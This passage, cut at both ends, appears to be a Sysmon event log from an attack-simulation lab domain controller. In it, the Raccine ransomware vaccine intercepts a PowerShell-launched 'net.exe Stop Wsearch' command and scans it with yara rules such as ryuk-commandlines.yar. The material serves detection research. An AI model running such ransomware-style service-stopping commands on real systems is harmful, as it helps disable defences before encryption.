Files\Raccine\Raccine.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002258248Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.454{9DBE88B5-5873-61B2-9E09-010000000E02}70004340C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002258181Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.411{9DBE88B5-C32E-61A8-0C00-000000000E02}8486480C:\Windows\system32\svchost.exe{9DBE88B5-5878-61B2-B809-010000000E02}6160C:\Program Files\Raccine\Raccine.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653ea|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49a4b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002258179Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.405{9DBE88B5-5873-61B2-9E09-010000000E02}70004340C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-5878-61B2-B809-010000000E02}6160C:\Program Files\Raccine\Raccine.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002258163Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.397{9DBE88B5-5873-61B2-9E09-010000000E02}70004340C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002258097Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.355{9DBE88B5-C32E-61A8-0C00-000000000E02}8486480C:\Windows\system32\svchost.exe{9DBE88B5-5878-61B2-B809-010000000E02}6160C:\Program Files\Raccine\Raccine.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653ea|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49a4b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002258096Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.355{9DBE88B5-5878-61B2-B809-010000000E02}61607360C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3AAE-61AE-0DA8-000000000E02}6776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Raccine\Raccine.exe+c914|C:\Program Files\Raccine\Raccine.exe+5894|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002258094Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.349{9DBE88B5-5873-61B2-9E09-010000000E02}70004340C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-5878-61B2-B809-010000000E02}6160C:\Program Files\Raccine\Raccine.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002258079Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.341{9DBE88B5-5873-61B2-9E09-010000000E02}70004340C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002258013Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.298{9DBE88B5-C32E-61A8-0C00-000000000E02}8486480C:\Windows\system32\svchost.exe{9DBE88B5-5878-61B2-B809-010000000E02}6160C:\Program Files\Raccine\Raccine.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653ea|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49a4b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002258012Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.297{9DBE88B5-5878-61B2-B809-010000000E02}61607360C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5878-61B2-B909-010000000E02}1516C:\Windows\system32\net.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Raccine\Raccine.exe+c914|C:\Program Files\Raccine\Raccine.exe+57ef|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x80000000000000002258011Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.294{9DBE88B5-5878-61B2-B809-010000000E02}6160ATTACKRANGE\AdministratorC:\Program Files\Raccine\Raccine.exeC:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac43FA.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002258010Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.288{9DBE88B5-5878-61B2-B809-010000000E02}61607360C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5878-61B2-B909-010000000E02}1516C:\Windows\system32\net.exe0x1c3aC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+c6f00|C:\Windows\System32\KERNELBASE.dll+c6e21|C:\Program Files\Raccine\Raccine.exe+1876|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002258004Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.287{9DBE88B5-5878-61B2-B809-010000000E02}61607360C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5878-61B2-B909-010000000E02}1516C:\Windows\system32\net.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+1848|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002258003Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.288{9DBE88B5-5878-61B2-B909-010000000E02}1516C:\Windows\System32\net.exe10.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Net CommandMicrosoft® Windows® Operating SystemMicrosoft Corporationnet.exe"C:\Windows\system32\net.exe" Stop WsearchC:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=C6B6DAA95CEA707F8D986D933E4A9596,SHA256=FDDC5F29F779A6EF73D70A2C551397FDEE63F549F2BCE4FE6A7AEEDC11F4F72E,IMPHASH=C41B15F592DE4589047CE5119CE87468{9DBE88B5-5878-61B2-B809-010000000E02}6160C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" Stop Wsearch 10341000x80000000000000002258002Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.279{9DBE88B5-3AAE-61AE-0EA8-000000000E02}68046848C:\Windows\system32\conhost.exe{9DBE88B5-5878-61B2-B809-010000000E02}6160C:\Program Files\Raccine\Raccine.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002257997Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.277{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44926092C:\Windows\system32\csrss.exe{9DBE88B5-5878-61B2-B809-010000000E02}6160C:\Program Files\Raccine\Raccine.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002257996Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.276{9DBE88B5-3AAE-61AE-0DA8-000000000E02}67766968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{9DBE88B5-5878-61B2-B809-010000000E02}6160C:\Program Files\Raccine\Raccine.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+ca360024(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e347d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e30b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+ca2ab3e6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97a002a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c9803a9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e5aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e5aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e593c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97d665c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e3b9e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e3710(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e347d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e30b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+ca2ab3e6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97c8363(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97c78d5(wow64) 154100x80000000000000002257995Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.277{9DBE88B5-5878-61B2-B809-010000000E02}6160C:\Program Files\Raccine\Raccine.exe1.4.2.0 BETAA Simple Ransomware Vaccine - see https://github.com/Neo23x0/RaccineRaccineRaccineRaccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" Stop WsearchC:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=287F6CFBFFD83B75A0F8F749B0F636F3,SHA256=E5364CE4BD1814E003215BFF10DD2F191C33199260DFD2688D4F6CCE4A7C75B8,IMPHASH=B9673CBFF2550CFBFA1668EF53412C24{9DBE88B5-3AAE-61AE-0DA8-000000000E02}6776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x80000000000000002257929Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:45.748{9DBE88B5-5873-61B2-9C09-010000000E02}700ATTACKRANGE\AdministratorC:\Program Files\Raccine\Raccine.exeC:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac3257.tmpMD5=81F9601E3C5B8DB1A73307642B20A3EA,SHA256=6B7B5FA27F691C9C3E00685A9A6A2CEBEF55FB586E5C73427B288F14E873D9E6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002257890Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.341{9DBE88B5-5874-61B2-B509-010000000E02}81886376C:\Program Files\Raccine\yara64.exe{9DBE88B5-3AAE-61AE-0DA8-000000000E02}6776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Raccine\yara64.exe+8503f|C:\Program Files\Raccine\yara64.exe+7ce90|C:\Program Files\Raccine\yara64.exe+73b07|C:\Program Files\Raccine\yara64.exe+7303c|C:\Program Files\Raccine\yara64.exe+17c129|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002257887Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.327{9DBE88B5-5874-61B2-B609-010000000E02}27205768C:\Windows\system32\conhost.exe{9DBE88B5-5874-61B2-B509-010000000E02}8188C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002257881Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.314{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44926092C:\Windows\system32\csrss.exe{9DBE88B5-5874-61B2-B509-010000000E02}8188C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002257880Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.314{9DBE88B5-5873-61B2-9C09-010000000E02}7008004C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5874-61B2-B509-010000000E02}8188C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+116f5|C:\Program Files\Raccine\Raccine.exe+6156|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002257879Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.315{9DBE88B5-5874-61B2-B509-010000000E02}8188C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\in-memory\gen_loaders.yar" 6776 -d MemoryScan=1 -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' Stop Wsearch" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5873-61B2-9C09-010000000E02}700C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" Stop Wsearch 10341000x80000000000000002257876Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.298{9DBE88B5-5874-61B2-B409-010000000E02}61487684C:\Windows\system32\conhost.exe{9DBE88B5-5874-61B2-B309-010000000E02}8108C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002257870Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.286{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-5874-61B2-B309-010000000E02}8108C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002257869Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.286{9DBE88B5-5873-61B2-9C09-010000000E02}7008004C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5874-61B2-B309-010000000E02}8108C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002257868Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.287{9DBE88B5-5874-61B2-B309-010000000E02}8108C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\ryuk-commandlines.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac3257.tmp -d Name="net.exe" -d 